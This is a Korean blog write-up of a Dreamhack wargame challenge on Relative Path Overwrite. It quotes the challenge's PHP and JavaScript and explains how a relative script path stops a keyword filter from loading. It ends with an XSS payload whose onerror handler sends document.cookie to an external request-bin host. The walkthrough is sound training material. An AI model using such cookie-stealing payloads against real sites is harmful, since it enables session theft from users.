[Dreamhack] Level 2: Relative Path Overwrite

CTF, War game

[Dreamhack] Level 2: Relative Path Overwrite

mnzy🌱 2024. 4. 26. 18:27

1. 문제

https://dreamhack.io/wargame/challenges/439

Relative Path Overwrite

Description Exercise: Relative Path Overwrite에서 실습하는 문제입니다. 문제 수정 내역 2023.08.10 bot.py 수정, Dockerfile 제공

dreamhack.io

2. 해결 과정

index.php 페이지의 코드이다.

page 라는 파라미터를 받아 해당 페이지에 맞는 php 파일을 include한다.

해당 코드에서 .., :, / 과 같은 문자는 필터링하기 때문에 LFI 공격은 불가능하다.

  <div class="container">
      <?php
          $page = $_GET['page'] ? $_GET['page'].'.php' : 'main.php';
          if (!strpos($page, "..") && !strpos($page, ":") && !strpos($page, "/"))
              include $page;
      ?>
    </div>

vuln.php 코드는 filter.js 라는 파일을 스크립트 태그의 src로 로드하고(filter라는 배열이 정의되어 있음), param 이라는 id를 갖는 pre 태그를 선언한다.

GET 메소드로 전달된 param 파라미터에 filter.js 정의되어있는 filter 배열 문자열들이 포함되어 있는지 확인하고, 포함되어 있다면 nope!!을 출력한다. 이후 필터링된 param 값을 <pre id=param></pre> 요소의 inner HTML로 삽입한다.

즉, URL을 조작하여 스크립트 코드를 param 쿼리 파라미터로 삽입할 경우, innerHTML을 사용함으로써 그 코드가 실행될 수 있다.

//fileter.js
var filter = ["script", "on", "frame", "object"];

<script src="filter.js"></script>
<pre id=param></pre>
<script>
    var param_elem = document.getElementById("param");
    var url = new URL(window.location.href);
    var param = url.searchParams.get("param");
    if (typeof filter !== 'undefined') {
        for (var i = 0; i < filter.length; i++) {
            if (param.toLowerCase().includes(filter[i])) {
                param = "nope !!";
                break;
            }
        }
    }

    param_elem.innerHTML = param;
</script>

폼에 작성된 입력값을 base64로 인코딩한 후 escape되어 실행한다.

<?php
if(isset($_POST['path'])){
    exec(escapeshellcmd("python3 /bot.py " . escapeshellarg(base64_encode($_POST['path']))) . " 2>/dev/null &", $output);
    echo($output[0]);
}
?>

<form method="POST" class="form-inline">
    <div class="form-group">
        <label class="sr-only" for="path">/</label>
        <div class="input-group">
            <div class="input-group-addon">http://127.0.0.1/</div>
            <input type="text" class="form-control" id="path" name="path" placeholder="/">
        </div>
    </div>
    <button type="submit" class="btn btn-primary">Report</button>
</form>

vuln.php 내에서 이용자의 입력 값이 innerHTML로 들어가기 때문에 DOM XSS가 발생할 수 있다.

하지만, 자바스크립트 단에서 XSS 공격으로 이어질 수 있는 키워드를 모두 필터링하고 있다.

이 때 키워드가 모여있는 filter 변수는 filter.js 파일 내에 선언되어 있으며, 첫 줄에서 script 태그를 이용해 로드하면서 초기화되므로, 키워드를 필터링할 때 만약 filter라는 변수가 존재하지 않으면 필터링 자체를 수행하지 않기 때문에 filter.js를 정상적으로 로드시키지 않을 수 있다면 필터링을 우회할 수 있게 된다.

filter.js를 로드할 때에는 절대주소가 아닌 상대주소로 로드하기 때문에 현재 경로에 따라 올바르지 않은 파일을 로드하거나, 로드 자체에 실패할 수도 있다.

따라서 Relative Path Overwrite을 이용해 브라우저와 서버가 인식하는 경로를 다르게 만든 후, vuln.php에 접속한다면 filter 변수가 정의되지 않도록 할 수 있다.

//filter.js
var filter = ["script", "on", "frame", "object"];

//vuln.php
<script src="filter.js"></script>

이때, index.php/ 페이지를 사용하여 주소에 해당 경로를 삽입하게 되면 상대경로였던 script.js 파일이 잘못 로드되어 filter 변수가 undefined 되어 필터링이 먹히지 않는다.

/index.php?vuln 페이지에서 발생하는 RPO+XSS 취약점을 통해 쿠키를 탈취해야 한다.

DOM XSS가 발생하는 것이기 때문에 on 이벤트 핸들러를 기반으로 한 XSS 공격을 수행해야한다.

이때, 쿠키값을 탈취해서 플래그값을 얻어낼 것이다.

- 드림핵 Request Bin 기능 사용: https://tools.dreamhack.games/

따라서 report 페이지에 아래의 값 입력

index.php/?page=vuln&param=<img src=@ onerror=location.href="https://xbgfmqj.request.dreamhack.games/"%2bdocument.cookie>

플래그 확인